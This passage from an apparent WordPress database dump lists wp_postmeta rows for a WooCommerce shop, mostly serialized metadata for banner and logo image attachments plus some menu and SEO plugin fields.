g\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1024x479.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1536x718.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-2048x957.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:51:\"banner-Recovered-01-scaled-e1643786852625-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:51:\"banner-Recovered-01-scaled-e1643786852625-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2444,678,'_wp_attached_file','2022/02/banner-Recovered-01-e1643786409871.png'),(2445,678,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:46:\"2022/02/banner-Recovered-01-e1643786409871.png\";s:8:\"filesize\";i:239654;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:100012;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15282;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:44:\"banner-Recovered-01-e1643786409871-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2220;}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-01-e1643786409871-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-01-e1643786409871-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-01-e1643786409871-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2447,678,'_wp_attachment_backup_sizes','a:17:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1917;s:6:\"height\";i:896;s:4:\"file\";s:23:\"banner-Recovered-01.png\";}s:18:\"full-1643786280743\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"banner-Recovered-01-e1643786259457.png\";}s:18:\"full-1643786392842\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"banner-Recovered-01-e1643786280743.png\";}s:18:\"full-1643786409871\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"banner-Recovered-01-e1643786392842.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}'),(2448,675,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2560;s:6:\"height\";i:1197;s:4:\"file\";s:30:\"banner-Recovered-03-scaled.jpg\";}s:18:\"full-1643786515355\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:45:\"banner-Recovered-03-scaled-e1643786506205.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1024x479.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1536x718.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-2048x957.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-03-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-03-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-03-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(2449,674,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2560;s:6:\"height\";i:1197;s:4:\"file\";s:30:\"banner-Recovered-04-scaled.jpg\";}s:18:\"full-1643786574466\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:45:\"banner-Recovered-04-scaled-e1643786561495.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1024x479.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1536x718.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-2048x957.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-04-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-04-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-04-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(2452,676,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2560;s:6:\"height\";i:1197;s:4:\"file\";s:30:\"banner-Recovered-01-scaled.jpg\";}s:18:\"full-1643786852625\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:45:\"banner-Recovered-01-scaled-e1643786841737.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1024x479.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1536x718.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-2048x957.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-01-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(2458,682,'_customize_changeset_uuid','0cff6199-07cb-4325-8a04-4ac500d4020e'),(2459,685,'_menu_item_type','post_type'),(2460,685,'_menu_item_menu_item_parent','0'),(2461,685,'_menu_item_object_id','682'),(2462,685,'_menu_item_object','page'),(2463,685,'_menu_item_target',''),(2464,685,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2465,685,'_menu_item_xfn',''),(2466,685,'_menu_item_url',''),(2469,682,'_edit_lock','1643976870:1'),(2470,686,'_wp_attached_file','2022/02/banner-Recovered-01-1.png'),(2471,686,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1917;s:6:\"height\";i:896;s:4:\"file\";s:33:\"2022/02/banner-Recovered-01-1.png\";s:8:\"filesize\";i:540908;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"banner-Recovered-01-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98807;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"banner-Recovered-01-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15323;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-01-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2225;}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"banner-Recovered-01-1-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"banner-Recovered-01-1-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-01-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2472,682,'_edit_last','1'),(2473,682,'_aioseo_title','#post_title #separator_sa #site_title'),(2474,682,'_aioseo_description','#post_content'),(2475,682,'_aioseo_keywords',''),(2476,682,'_aioseo_og_title',NULL),(2477,682,'_aioseo_og_description',NULL),(2478,682,'_aioseo_og_article_section',''),(2479,682,'_aioseo_og_article_tags',''),(2480,682,'_aioseo_twitter_title',NULL),(2481,682,'_aioseo_twitter_description',NULL),(2482,11,'_edit_lock','1645096521:1'),(2483,689,'_wp_attached_file','2022/02/MITRA-06.png'),(2484,689,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:4167;s:6:\"height\";i:4168;s:4:\"file\";s:20:\"2022/02/MITRA-06.png\";s:8:\"filesize\";i:2428029;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"MITRA-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35090;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"MITRA-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6268;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"MITRA-06-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2264;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"MITRA-06-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"MITRA-06-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"MITRA-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"MITRA-06-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"MITRA-06-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"MITRA-06-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"MITRA-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"MITRA-06-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"MITRA-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"MITRA-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"MITRA-06-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2487,691,'_wp_attached_file','2022/02/final-logo-06.png'),(2488,691,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:4167;s:6:\"height\";i:4168;s:4:\"file\";s:25:\"2022/02/final-logo-06.png\";s:8:\"filesize\";i:2976421;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"final-logo-06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41283;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"final-logo-06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7530;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"final-logo-06-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2859;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"final-logo-06-300x300.png\";